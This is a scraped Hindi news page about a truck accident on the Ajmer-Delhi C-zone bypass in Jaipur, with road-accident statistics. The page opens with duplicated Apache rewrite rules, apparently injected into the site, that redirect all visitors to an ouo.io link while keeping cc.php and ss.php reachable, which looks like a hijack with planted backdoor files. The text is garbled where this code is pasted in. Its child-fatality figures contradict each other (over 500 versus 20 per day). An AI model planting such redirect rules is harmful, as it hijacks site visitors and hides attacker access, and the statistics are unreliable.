
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 368
Previousजयपुर। जयपुर में आज सुबह एक ट्रक चालक हो नींद की झपकी आने से हादसा हो गया। अजमेर-दिल्ली सी-जोन बाईपास पर यह हादसा कालवाड़ पुलिया के पास हुअा। ट्रक बेकाबू होकर करीब 35-40 फीट नीचे जा गिरा। हादसे के बाद करधनी थाना पुलिस मौके पर पहुंची और ट्रक को कैन से हटवाया।
जानकारी के अनुसार ट्रक में ट्रांसपोटर्स का सामान लदा हुआ था और हादस के बाद वह सड़क पर फैल गया। सर्विस लेन पर ट्रक के गिरने से वहां जाम के हालत हो गए। हालांकि पुलिस ने ट्रक को जल्दी ही हटाते हुए यातायात दुरुस्त किया। मीडिया रिपोर्ट्स की मानें तो सड़क हादसों के मामले में राजस्थान देश में पांचवें स्थान पर है। देशभर का आंकड़ा देखें तो पिछले साल 2016 में कुल 1,50,785 लोग सड़क हादसों के कारण मौत का शिकार बने, जबकि 4,94,624 लोग हादसों में जख्मी हुए। प्रतिदिन 500 से अधिक बच्चे सड़क दुर्घटनाओं में जान गंवा बैठते हैं। नेशनल क्राइम रिकॉर्ड ब्यूरो (2013) के अनुसार प्रतिदिन 14 वर्ष से कम आयु के 20 बच्चे भारत में सड़क दुर्घटनाओं के कारण दम तोड़ देते हैं. वहीं आधिकारिक आंकड़ों के अनुसार साल 2014 में सड़क हादसोंं में 1,41,526 लोगों की मौत हुई और 4,77,731 लोग घायल हुए।